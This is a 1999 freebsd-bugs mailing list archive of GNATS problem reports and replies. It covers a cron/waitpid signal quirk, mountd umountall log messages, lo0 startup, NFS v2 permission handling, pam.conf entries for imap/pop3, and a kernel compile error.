08:38:43 CST, William King wrote: > find attached x.tar containing x.c and makefile. make x and > run it under cron. then try running it by hand. Ah. The parent arranges for delivery of a SIGALRM in 60 seconds. The program forks. The parent waits on the child pid with waitpid(). The child sleeps 10 seconds, then exits. The parent returns from waitpid() on receipt of SIGARLM. When the program is not run from cron, the parent returns from waitpid() when the child exits as expected. Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Nov 4 8:40:39 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 675B114CB2 for ; Thu, 4 Nov 1999 08:40:37 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA40918; Thu, 4 Nov 1999 08:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Thu, 4 Nov 1999 08:40:01 -0800 (PST) Message-Id: <199911041640.IAA40918@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Andrew Heybey Subject: kern/10676: 3.1-RELEASE deadlocks under load with processes in vmwait Reply-To: Andrew Heybey Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR kern/10676; it has been noted by GNATS. From: Andrew Heybey To: freebsd-gnats-submit@freebsd.org Cc: Subject: kern/10676: 3.1-RELEASE deadlocks under load with processes in vmwait Date: Thu, 04 Nov 1999 11:30:22 -0500 I just noticed this was still open, so I thought that I would add that this problem was fixed by commits made to the vm system right about the date of the PR by Julian Elischer. Sorry, I don't remember the exact changes but I know that by upgrading my world to -STABLE as of 21-MAR-99 the problem went away. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Nov 4 9:50:46 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 314F615828 for ; Thu, 4 Nov 1999 09:50:43 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA47168; Thu, 4 Nov 1999 09:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from cc942873-a.ewndsr1.nj.home.com (cc942873-a.ewndsr1.nj.home.com [24.2.89.207]) by hub.freebsd.org (Postfix) with ESMTP id B6EDB14DED for ; Thu, 4 Nov 1999 09:40:01 -0800 (PST) (envelope-from cjc@cc942873-a.ewndsr1.nj.home.com) Received: (from cjc@localhost) by cc942873-a.ewndsr1.nj.home.com (8.9.3/8.9.3) id MAA20940; Thu, 4 Nov 1999 12:42:38 -0500 (EST) (envelope-from cjc) Message-Id: <199911041742.MAA20940@cc942873-a.ewndsr1.nj.home.com> Date: Thu, 4 Nov 1999 12:42:38 -0500 (EST) From: "Crist J. Clark" Reply-To: cjc@cc942873-a.ewndsr1.nj.home.com To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: bin/14709: umountall requests possibly mishandled by mountd(8) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14709 >Category: bin >Synopsis: umountall requests possibly mishandled by mountd(8) >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Thu Nov 4 09:50:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Crist J. Clark >Release: FreeBSD 3.3-STABLE i386 >Organization: >Environment: FreeBSD 3.x system with mountd(8) running. >Description: Several users have reported (search the -questions mail archive on the string 'umountall' for a sample) strange messages of the form, mountd[]: umountall request from from unprivileged port Where is an IP address of the host (not the loopback, however) appearing in their messages log. No events taking place on the server in question seems to correlate the the messages. I have been able to build a very strong correlation between the messages and other computers on the local network being shutdown (see the mail archives, http://www.freebsd.org/cgi/getmsg.cgi?fetch=1737357+1744288+/usr/local/www/db/text/1999/freebsd-questions/19991017.freebsd-questions for some examples from my personal logs). I believe that when machines broadcast their impending shutdown to the network, the mountd(8) process produces these messages. The messages worry me for two reasons, (1) The server is reporting a request from _itself_ rather than the machine in question. This means that the server is either spoofing itself (very bad) or is trying to talk to itself on an unpriviliged port and failing (why would it do that?). (2) The machine that generates the umountall need not actually have mounted a filesystem from the server. In fact, in the example I referenced above, only one of the machines that caused a message by going down actually had mounted anything from the server. This _seems_ to say that any machine on the LAN, regardless of permissions to mount, could possibly exploit any problems that this message may be hinting to. >How-To-Repeat: From my experience and a quick look over other emails on this topic, all you need is a FreeBSD 3.x machine running mountd(8), then bring another machine on the network down (there may be ways to generate the error by doing something less extreme than shutting down a second machine, but this is when I observe the messages without fail). >Fix: Origin of problem not yet understood. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Nov 4 9:51:34 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 35683151C2 for ; Thu, 4 Nov 1999 09:51:27 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA47175; Thu, 4 Nov 1999 09:50:07 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Thu, 4 Nov 1999 09:50:07 -0800 (PST) Message-Id: <199911041750.JAA47175@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Jason Seidel Subject: Re: misc/13995: Full duplex mode doesn't work right with de0 driver DEC/Intel DC21x4x (``Tulip'') Reply-To: Jason Seidel Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR misc/13995; it has been noted by GNATS. From: Jason Seidel To: freebsd-gnats-submit@freebsd.org, root@kodiak.sdsmt.edu Cc: Subject: Re: misc/13995: Full duplex mode doesn't work right with de0 driver DEC/Intel DC21x4x (``Tulip'') Date: Thu, 04 Nov 1999 10:41:00 -0700 It does not work at 100Mps Full-Duplex right either. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Nov 4 10: 0: 5 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 07BAE14DF6 for ; Thu, 4 Nov 1999 10:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA48274; Thu, 4 Nov 1999 10:00:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 15FBA14D29; Thu, 4 Nov 1999 09:56:51 -0800 (PST) Message-Id: <19991104175651.15FBA14D29@hub.freebsd.org> Date: Thu, 4 Nov 1999 09:56:51 -0800 (PST) From: walter@walter.anet.cz To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: kern/14711: line ifconfig_lo0="127.0.0.1" does not initialise lo0 on startup Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14711 >Category: kern >Synopsis: line ifconfig_lo0="127.0.0.1" does not initialise lo0 on startup >Confidential: no >Severity: non-critical >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Thu Nov 4 10:00:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Antonin Walter >Release: FreeBSD 3.3 >Organization: DNA CE s.r.o. >Environment: >Description: on starting the system the loop interface is not starting even if rc.conf has the corresponding entries >How-To-Repeat: start the computer >Fix: to run manualy ifconfig from the prompt - but the is not a fix of a bug >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Nov 4 10: 6:57 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id C8C23151C2; Thu, 4 Nov 1999 10:06:56 -0800 (PST) (envelope-from ken@FreeBSD.org) Received: (from ken@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA48926; Thu, 4 Nov 1999 10:06:55 -0800 (PST) (envelope-from ken@FreeBSD.org) Date: Thu, 4 Nov 1999 10:06:55 -0800 (PST) From: Message-Id: <199911041806.KAA48926@freefall.freebsd.org> To: ath@niksun.com, ken@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/10676: 3.1-RELEASE deadlocks under load with processes in vmwait Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: 3.1-RELEASE deadlocks under load with processes in vmwait State-Changed-From-To: open->closed State-Changed-By: ken State-Changed-When: Thu Nov 4 10:06:17 PST 1999 State-Changed-Why: Submitter reports that his problem has gone away. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Nov 4 10:41:35 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id D711E155E5 for ; Thu, 4 Nov 1999 10:41:33 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA52024; Thu, 4 Nov 1999 10:40:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Thu, 4 Nov 1999 10:40:02 -0800 (PST) Message-Id: <199911041840.KAA52024@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Adam Szilveszter Subject: Re: kern/14711: line ifconfig_lo0="127.0.0.1" does not initialise lo0 on startup Reply-To: Adam Szilveszter Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR kern/14711; it has been noted by GNATS. From: Adam Szilveszter To: walter@walter.anet.cz Cc: freebsd-gnats-submit@freebsd.org Subject: Re: kern/14711: line ifconfig_lo0="127.0.0.1" does not initialise lo0 on startup Date: Thu, 4 Nov 1999 19:49:33 +0100 (CET) Hi! What does your /etc/rc.conf and ifconfig -a have to say? Also the output of uname -a would be more helpful then just "FreeBSD 3.3". Cheers! Szilveszter ADAM ------------------------------------------------------------------------------- * Adam Szilveszter * JATE Szeged * email: sziszi@petra.hos.u-szeged.hu * * Homepage : none * alternate email: cc@flanker.itl.net.ua * * Finger sziszi@petra.hos.u-szeged.hu for PGP key. * * I prefer using the door instead of Windows(tm)... * To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Nov 4 10:41:45 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 7FF0A15870 for ; Thu, 4 Nov 1999 10:41:38 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA52029; Thu, 4 Nov 1999 10:40:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Thu, 4 Nov 1999 10:40:03 -0800 (PST) Message-Id: <199911041840.KAA52029@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Ruslan Ermilov Subject: Re: kern/14711: line ifconfig_lo0="127.0.0.1" does not initialise lo0 on startup Reply-To: Ruslan Ermilov Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR kern/14711; it has been noted by GNATS. From: Ruslan Ermilov To: walter@walter.anet.cz Cc: freebsd-gnats-submit@FreeBSD.ORG Subject: Re: kern/14711: line ifconfig_lo0="127.0.0.1" does not initialise lo0 on startup Date: Thu, 4 Nov 1999 20:33:11 +0200 On Thu, Nov 04, 1999 at 09:56:51AM -0800, walter@walter.anet.cz wrote: > > line ifconfig_lo0="127.0.0.1" does not initialise lo0 on startup > Let me guess. Your "network_interfaces" variable in /etc/rc.conf is set to somethink like "xxx auto", right? If so, could you please consult with a 3.3-RELEASE's Errata Notes at http://www.freebsd.cris.net/releases/3.3R/errata.html and tell us whether changing "auto" to "lo0" fixes your problem. -- Ruslan Ermilov Sysadmin and DBA of the ru@ucb.crimea.ua United Commercial Bank, ru@FreeBSD.org FreeBSD committer, +380.652.247.647 Simferopol, Ukraine http://www.FreeBSD.org The Power To Serve http://www.oracle.com Enabling The Information Age To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Nov 4 13: 1:20 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id F0F9F1513D for ; Thu, 4 Nov 1999 13:01:16 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA64408; Thu, 4 Nov 1999 13:00:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from galileo.math.uic.edu (galileo.math.uic.edu [131.193.179.162]) by hub.freebsd.org (Postfix) with SMTP id 552C415142 for ; Thu, 4 Nov 1999 12:57:28 -0800 (PST) (envelope-from vladimir@math.uic.edu) Received: (qmail 38653 invoked by uid 31415); 4 Nov 1999 20:56:36 -0000 Message-Id: <19991104205636.38652.qmail@galileo.math.uic.edu> Date: 4 Nov 1999 20:56:36 -0000 From: vladimir@math.uic.edu Reply-To: vladimir@math.uic.edu To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: kern/14712: problems with access bits on NFS mounted directories, nfs vers 2 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14712 >Category: kern >Synopsis: root has access to NFS mounted directories with maproot=nobody >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Thu Nov 4 13:00:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Vladimir V. Egorin >Release: FreeBSD 3.3-STABLE i386 >Organization: University of Illinois at Chicago, Department of Mathematics >Environment: NFS server running FreeBSD 3.3-STABLE. NFS client running Solaris 7 (the same problem is reproducible on linux machines). >Description: Root on a client is allowed to list the directory contents, even if the mode of the directory is 711. Directory is NFS-mounted using NFS vers.2. >How-To-Repeat: galileo: BSD NFS server galois: NFS client (solaris 7) On galileo: $ ls -ld /export/4/magma drwx--x--x 7 magma math 512 Nov 1 15:36 /export/4/magma/ On galois: # mount -o vers=2 galileo:/export/4 /mnt # ls /mnt/magma LAB_HOME/ Magma2.3/ Magma2.6/ public_html@ Magma2.2/ Magma2.4/ Mailbox # umount /mnt # mount -o vers=3 galileo:/export/4 /mnt # ls /mnt/magma /mnt/magma: Permission denied NFS version 3 mount produces expected results. With NFS v.2 root is allowed to access directory. >Fix: Don't know. I also have 2 linux clients mounting directories from the same server. root on one of them has access to restricted directories, on the other it has no access (kernels have different versions). I'll be happy to provide tcpdump output of NFS packets and any other additional informations. >Release-Note: >Audit-Trail: >Unformatted: Vladimir V. Egorin To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Nov 4 14:40:27 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id C28C71568B for ; Thu, 4 Nov 1999 14:40:25 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id OAA71834; Thu, 4 Nov 1999 14:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from monkeys.com (i180.value.net [206.14.136.180]) by hub.freebsd.org (Postfix) with ESMTP id B08C61568B for ; Thu, 4 Nov 1999 14:37:13 -0800 (PST) (envelope-from rfg@monkeys.com) Received: (from rfg@localhost) by monkeys.com (8.9.3/8.9.3) id OAA15426; Thu, 4 Nov 1999 14:35:16 -0800 (PST) Message-Id: <199911042235.OAA15426@monkeys.com> Date: Thu, 4 Nov 1999 14:35:16 -0800 (PST) From: "Ronald F. Guilmette" Reply-To: rfg@monkeys.com (Ronald F. Guilmette) To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: conf/14714: Need support for imap4 and pop3 in /etc/pam.conf Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14714 >Category: conf >Synopsis: Need support for imap4 and pop3 in /etc/pam.conf >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Thu Nov 4 14:40:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Ronald F. Guilmette >Release: FreeBSD 3.3-RELEASE i386 >Organization: E-Scrub Technologies, Inc. >Environment: >Description: There is no support for imap4 or pop3 servers in /etc/pam.conf. >How-To-Repeat: Grab the Cyrus imapd package (and the associated SASL library) from ftp://ftp.andrew.cmu.edu/pub/cyrus-mail/ and then build and install them and then try to use them. You will immediately run into problems when you try to authenticate yourself to either the imapd server or the pop3d server because they both use the Cyrus SASL library for handling authentication and it in turn uses PAM (where available). But the /etc/pam.conf file that is being distributed with FreeBSD 3.3 doesn't know anything about any services called either "imap" or "pop3", so you will just get authentication failures and messages to the syslog like: blah blah blah: no modules loaded for service "imap" >Fix: Add the following two lines to /etc/pam.conf: imap auth required pam_unix.so try_first_pass pop3 auth required pam_unix.so try_first_pass >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Nov 4 15:20:29 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 7D23E14D7C for ; Thu, 4 Nov 1999 15:20:28 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA74379; Thu, 4 Nov 1999 15:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Thu, 4 Nov 1999 15:20:01 -0800 (PST) Message-Id: <199911042320.PAA74379@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Martin Blapp Subject: Re: bin/14709: umountall requests possibly mishandled by mountd(8) Reply-To: Martin Blapp Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR bin/14709; it has been noted by GNATS. From: Martin Blapp To: freebsd-gnats-submit@freebsd.org, cjc@cc942873-a.ewndsr1.nj.home.com Cc: Subject: Re: bin/14709: umountall requests possibly mishandled by mountd(8) Date: Fri, 05 Nov 1999 00:12:53 +0100 I've seen this several times on different machines. Something seems to be very wrong here. I'll look into this more close because I'm currently do a cleanup of mountd. Thank you for your report Martin Blapp Improware AG, Switzerland To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Nov 4 15:20:37 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id A8396155BC for ; Thu, 4 Nov 1999 15:20:34 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA74394; Thu, 4 Nov 1999 15:20:04 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Thu, 4 Nov 1999 15:20:04 -0800 (PST) Message-Id: <199911042320.PAA74394@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Martin Blapp Subject: Re: conf/14667: [FIX] wrong swissgerman/swissfrench ISO-keymaps Reply-To: Martin Blapp Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR conf/14667; it has been noted by GNATS. From: Martin Blapp To: freebsd-gnats-submit@freebsd.org, yokota@zodiac.mech.utsunomiya-u.ac.jp Cc: Subject: Re: conf/14667: [FIX] wrong swissgerman/swissfrench ISO-keymaps Date: Fri, 05 Nov 1999 00:17:32 +0100 Hi Kazu-San, There is a new version available with/without dead key's. The keymaps are in http://www.attic.ch/keymaps/ Martin To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Nov 4 22: 3:20 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 1751914DC7 for ; Thu, 4 Nov 1999 22:03:19 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id WAA01114; Thu, 4 Nov 1999 22:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Thu, 4 Nov 1999 22:00:02 -0800 (PST) Message-Id: <199911050600.WAA01114@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Vallo Kallaste Subject: Re: bin/14709: umountall requests possibly mishandled by mountd(8) Reply-To: Vallo Kallaste Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR bin/14709; it has been noted by GNATS. From: Vallo Kallaste To: "Crist J. Clark" Cc: FreeBSD-gnats-submit@FreeBSD.ORG Subject: Re: bin/14709: umountall requests possibly mishandled by mountd(8) Date: Fri, 5 Nov 1999 07:53:27 +0200 On Thu, Nov 04, 1999 at 12:42:38PM -0500, "Crist J. Clark" wrote: > > >Number: 14709 > >Category: bin > >Synopsis: umountall requests possibly mishandled by mountd(8) > >Confidential: no > >Severity: serious > >Priority: medium > >Responsible: freebsd-bugs > >State: open > >Quarter: > >Keywords: > >Date-Required: > >Class: sw-bug > >Submitter-Id: current-users > >Arrival-Date: Thu Nov 4 09:50:00 PST 1999 > >Closed-Date: > >Last-Modified: > >Originator: Crist J. Clark > >Release: FreeBSD 3.3-STABLE i386 > >Organization: > >Environment: > > FreeBSD 3.x system with mountd(8) running. > > >Description: > > Several users have reported (search the -questions mail > archive on the string 'umountall' for a sample) strange messages of > the form, > > mountd[]: umountall request from from unprivileged port > > Where is an IP address of the host (not the loopback, however) > appearing in their messages log. No events taking place on the server > in question seems to correlate the the messages. > > I have been able to build a very strong correlation between > the messages and other computers on the local network being shutdown > (see the mail archives, > > http://www.freebsd.org/cgi/getmsg.cgi?fetch=1737357+1744288+/usr/local/www/db/text/1999/freebsd-questions/19991017.freebsd-questions > > for some examples from my personal logs). I've seen such behavior with -current systems as well. Here's what I have seen: Oct 5 22:07:11 myhakas mountd[150]: umountall request from 194.126.114.87 from unprivileged port Oct 8 20:07:38 myhakas mountd[149]: umountall request from 194.126.114.87 from unprivileged port Oct 8 21:34:30 myhakas mountd[149]: umountall request from 194.126.114.87 from unprivileged port Oct 8 23:24:50 myhakas mountd[149]: umountall request from 194.126.114.87 from unprivileged port Nov 2 20:02:32 myhakas mountd[150]: umountall request from 194.126.114.87 from unprivileged port Nov 3 09:00:48 myhakas mountd[150]: umountall request from 194.126.114.87 from unprivileged port The NFS server machine is running -current and serves 3.3-STABLE and one Solaris 2.6 box. -- Vallo Kallaste vallo@matti.ee To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Nov 4 23:19:52 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 8649515870; Thu, 4 Nov 1999 23:19:46 -0800 (PST) (envelope-from ru@FreeBSD.org) Received: (from ru@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id XAA06942; Thu, 4 Nov 1999 23:17:21 -0800 (PST) (envelope-from ru@FreeBSD.org) Date: Thu, 4 Nov 1999 23:17:21 -0800 (PST) From: Message-Id: <199911050717.XAA06942@freefall.freebsd.org> To: walter@walter.anet.cz, ru@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/14711: line ifconfig_lo0="127.0.0.1" does not initialise lo0 on startup Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: line ifconfig_lo0="127.0.0.1" does not initialise lo0 on startup State-Changed-From-To: open->closed State-Changed-By: ru State-Changed-When: Thu Nov 4 23:16:11 PST 1999 State-Changed-Why: Originator reports that the problem is fixed by following the instructions given in the 3.3-RELEASE Errata. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Nov 4 23:21:29 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 813AF158C8; Thu, 4 Nov 1999 23:21:27 -0800 (PST) (envelope-from ru@FreeBSD.org) Received: (from ru@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id XAA07305; Thu, 4 Nov 1999 23:21:27 -0800 (PST) (envelope-from ru@FreeBSD.org) Date: Thu, 4 Nov 1999 23:21:27 -0800 (PST) From: Message-Id: <199911050721.XAA07305@freefall.freebsd.org> To: ru@FreeBSD.org, freebsd-bugs@FreeBSD.org, jkh@FreeBSD.org Subject: Re: misc/14706: sysinstall coredumps Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Old Synopsis: No localhost interface / sysinstall coredumps New Synopsis: sysinstall coredumps Responsible-Changed-From-To: freebsd-bugs->jkh Responsible-Changed-By: ru Responsible-Changed-When: Thu Nov 4 23:20:00 PST 1999 Responsible-Changed-Why: Patch has been sent to Jordan to fix sysinstall problem. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Nov 5 6: 0: 6 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 0647B1522F for ; Fri, 5 Nov 1999 06:00:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id GAA47014; Fri, 5 Nov 1999 06:00:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 9D468151FF; Fri, 5 Nov 1999 05:55:57 -0800 (PST) Message-Id: <19991105135557.9D468151FF@hub.freebsd.org> Date: Fri, 5 Nov 1999 05:55:57 -0800 (PST) From: kugimoto@ntt-20.ecl.net To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: kern/14721: Kernel fails to compile with isp0 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14721 >Category: kern >Synopsis: Kernel fails to compile with isp0 >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Fri Nov 5 06:00:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Takeshi Kugimoto >Release: FreeBSD-2.2.8-STABLE >Organization: NTT Network Innovations Labs. >Environment: FreeBSD 2.2.8-STABLE/i386 >Description: After adding the line controller isp0 to kernel config file I got messages as follows: cc -c -O -Wreturn-type -Wcomment -Wredundant-decls -Wimplicit -Wnested-externs\ -Wstrict-prototypes -Wmissing-prototypes -Wpointer-arith -nostdinc -I- -I. -\ I../.. -I../../../include -DAPM_BROKEN_STATCLOCK -DFAILSAFE -DCOMPAT_43 -DMSDOS\ FS -DNFS -DFFS -DINET -DKERNEL ../../dev/isp/isp.c ../../dev/isp/isp.c: In function `ispscsicmd': ../../dev/isp/isp.c:1944: invalid operands to binary == *** Error code 1 Stop. Incidentally, 2.2.8-STABLE GENERIC config file includes "controller isp0" by default. Kernel fails to compile with GENERIC config. >How-To-Repeat: Just try to compile kernel with given configuration from 2.2.8-STABLE source code. >Fix: unknown >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Nov 5 6:40: 4 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 1C98214DD3 for ; Fri, 5 Nov 1999 06:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id GAA94590; Fri, 5 Nov 1999 06:40:01 -0800 (PST) (envelope-from 